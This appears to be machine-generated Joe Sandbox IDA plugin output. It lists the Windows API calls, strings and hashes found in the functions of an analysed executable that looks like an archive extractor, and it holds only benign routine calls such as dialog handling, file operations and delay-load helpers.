    • Opcode ID: a57e18d6658fc1eb58a77902e739aeddeab55467380e250c3146f463fc35cd0f
    • Instruction ID: e9a858b7174945b2462490683737147642cd6d80253d5c83b8b075d75e640940
    • Opcode Fuzzy Hash: a57e18d6658fc1eb58a77902e739aeddeab55467380e250c3146f463fc35cd0f
    • Instruction Fuzzy Hash: 92B012C12785027C324461A5AD02F3B010CC0D5B15330C43FF202C4480E4901D432173
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAFD5A
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • DestroyWindow.USER32(?,00000000,00CAE640,?,?,00000001,?,?,00CAC999,00CC60F0,00CF1CF0,00CF1CF0,00001000,?,00000000,?), ref: 00CAA241
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF32D
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF546
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: f45090042a106229dc731a9d5f78712fcd1851974fa5895e0b31686c9239617f
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: f45090042a106229dc731a9d5f78712fcd1851974fa5895e0b31686c9239617f
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF6FC
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1542d9b8a4aaa7811e156133b505500a70d4b33521dc9fa22be5b5ce973ff5af
    • Instruction ID: 8e934939a9f2710c35df95496a0c35a50ea60ace247d56867d9fcda0e8fbe1fa
    • Opcode Fuzzy Hash: 1542d9b8a4aaa7811e156133b505500a70d4b33521dc9fa22be5b5ce973ff5af
    • Instruction Fuzzy Hash: 36A001962B92037C321862A2AD56E3B121CC4E6B6A330893EF41294891A8A0198621B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9418604b49353671808bdb80ec3465c3007472c49b546a8ce6d433bee9b777c4
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: 9418604b49353671808bdb80ec3465c3007472c49b546a8ce6d433bee9b777c4
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 786211b0153e83a70b1a610a700f94796c9d4479f85ad1d344122d16c05ebfa9
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: 786211b0153e83a70b1a610a700f94796c9d4479f85ad1d344122d16c05ebfa9
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,00C9A83D,?,?,?,?,?,00CC37FF,000000FF), ref: 00C9A89B
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: 4321cba5932bf3434c4f5c82800848ca4c291d4849b374a62d86e4847a12a213
    • Instruction ID: 22bd959f9c4e9d0c11b5e0134e34285f542e67777bc2b19a489d03d336a9d56e
    • Opcode Fuzzy Hash: 4321cba5932bf3434c4f5c82800848ca4c291d4849b374a62d86e4847a12a213
    • Instruction Fuzzy Hash: 1DF0E230082B01AFDF308A24C44C792B3F4AB12325F040F5ED0F3439E0D3606A8E8B81
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CAD4A1
    • EndDialog.USER32(?,00000006), ref: 00CAD4B4
    • GetDlgItem.USER32(?,0000006C), ref: 00CAD4D0
    • SetFocus.USER32(00000000), ref: 00CAD4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CAD511
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CAD548
    • FindFirstFileW.KERNEL32(?,?), ref: 00CAD55E
      • Part of subcall function 00CABC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC2F
      • Part of subcall function 00CABC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CABC40
      • Part of subcall function 00CABC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CABC4E
      • Part of subcall function 00CABC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC5C
      • Part of subcall function 00CABC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CABC77
      • Part of subcall function 00CABC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00CABC9E
      • Part of subcall function 00CABC1B: _swprintf.LIBCMT ref: 00CABCC4
    • _swprintf.LIBCMT ref: 00CAD5A7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CAD5BA
    • FindClose.KERNEL32(00000000), ref: 00CAD5C1
    • _swprintf.LIBCMT ref: 00CAD610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CAD623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CAD640
    • _swprintf.LIBCMT ref: 00CAD673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CAD686
    • _swprintf.LIBCMT ref: 00CAD6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CAD6E3
      • Part of subcall function 00CAC083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CAC0A9
      • Part of subcall function 00CAC083: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CD072C,?,?), ref: 00CAC0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: 9042d60335bb4ae3663100f86707b62db7d69a46da1a4a3ae17b869808356f06
    • Instruction ID: 89d6c926b20fd9057876b9252141661aece6298472109f75a809f5089acb4385
    • Opcode Fuzzy Hash: 9042d60335bb4ae3663100f86707b62db7d69a46da1a4a3ae17b869808356f06
    • Instruction Fuzzy Hash: 1971B0725483057BE6319BA4DC89FFF7BACEB8A704F040819B75BD2481DA71AA049763
    APIs
    • __EH_prolog.LIBCMT ref: 00C97AB4
    • _wcslen.LIBCMT ref: 00C97B1D
    • _wcslen.LIBCMT ref: 00C97B8E
      • Part of subcall function 00C98704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C98713
      • Part of subcall function 00C98704: GetLastError.KERNEL32 ref: 00C98759
      • Part of subcall function 00C98704: CloseHandle.KERNEL32(?), ref: 00C98768
      • Part of subcall function 00C9B470: DeleteFileW.KERNEL32(?,00000000,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B481
      • Part of subcall function 00C9B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00C97C43
    • CloseHandle.KERNEL32(00000000), ref: 00C97C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C97DAB
      • Part of subcall function 00C9B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C97ED0,?,?,?,00000000), ref: 00C9B04C
      • Part of subcall function 00C9B032: SetFileTime.KERNEL32(?,?,?,?), ref: 00C9B100
      • Part of subcall function 00C9A880: CloseHandle.KERNEL32(000000FF,?,?,00C9A83D,?,?,?,?,?,00CC37FF,000000FF), ref: 00C9A89B
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: f9f3df2748e98fa83608ebada037033168563126f4c575b83da3427ac9d14a4f
    • Instruction ID: 004cf7ae529e9c3bc9bbac92c78ad8262a92c3bed7901ea7613dca5f26036349
    • Opcode Fuzzy Hash: f9f3df2748e98fa83608ebada037033168563126f4c575b83da3427ac9d14a4f
    • Instruction Fuzzy Hash: 9BC1F471915249EEDF25DBA4CC49FEEB7ACAF04300F00466AF556E3282D730AE44DBA1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 0189550aca83260453cfd96967c89335f6502ab0875fc44c1c671a3422ce2dc7
    • Instruction ID: 54b744b7b111518022b70f5e8d2d9efd477edd0de32574a52b3a7fc8957e2a50
    • Opcode Fuzzy Hash: 0189550aca83260453cfd96967c89335f6502ab0875fc44c1c671a3422ce2dc7
    • Instruction Fuzzy Hash: 96C22872E086288FDF25CE28DD407EAB7B9EB44305F1541EAD85DE7241E775AE828F40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 839cfc909029eb162fd3b07e6b5efba922aa8f23cc458ea167710760b5d439df
    • Instruction ID: 935505a827f81f69d1855523c29121631f9984c3e9122cd1af59829f2b6cd9ab
    • Opcode Fuzzy Hash: 839cfc909029eb162fd3b07e6b5efba922aa8f23cc458ea167710760b5d439df
    • Instruction Fuzzy Hash: D942E9716012859FDF28DF74C899AE93BE5AF15300F04447DFC5ACB282DB70AA89DB61
    APIs
    • __EH_prolog.LIBCMT ref: 00C92EBF
    • _strlen.LIBCMT ref: 00C9348B
      • Part of subcall function 00CA15F9: __EH_prolog.LIBCMT ref: 00CA15FE
      • Part of subcall function 00CA2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C9CF18,00000000,?,?), ref: 00CA2EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C935DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 716c19aa63e6470b20e34196405b45f291b536bcdb3f5900a8d184e839cc47d0
    • Instruction ID: fee2383899509df331fa5b5f337338477ee9a93619412ff31895ae683276decd
    • Opcode Fuzzy Hash: 716c19aa63e6470b20e34196405b45f291b536bcdb3f5900a8d184e839cc47d0
    • Instruction Fuzzy Hash: 5C6225716002C48FDF29DF38C8996E93BA1AF55304F08457EFCAA9B282DB749B45CB51
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CB0A06
    • IsDebuggerPresent.KERNEL32 ref: 00CB0AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CB0AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00CB0AFC
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 04a06c6213f0c3663ddb8a76928b85194ef11169f68a462d834a8dcb723d8549
    • Instruction ID: 541c6976f1c69c9bc4525bed13ed725e35f1686876ba14825b97eae9e0105dd1
    • Opcode Fuzzy Hash: 04a06c6213f0c3663ddb8a76928b85194ef11169f68a462d834a8dcb723d8549
    • Instruction Fuzzy Hash: 63311675D4521C9BDF21DFA4D989BCDBBB8AF08304F1041AAE409AB251EB719A849F44
    APIs
    • VirtualQuery.KERNEL32(80000000,00CAF764,0000001C,00CAF959,00000000,?,?,?,?,?,?,?,00CAF764,00000004,00CF3D24,00CAF9E9), ref: 00CAF830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CAF764,00000004,00CF3D24,00CAF9E9), ref: 00CAF84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
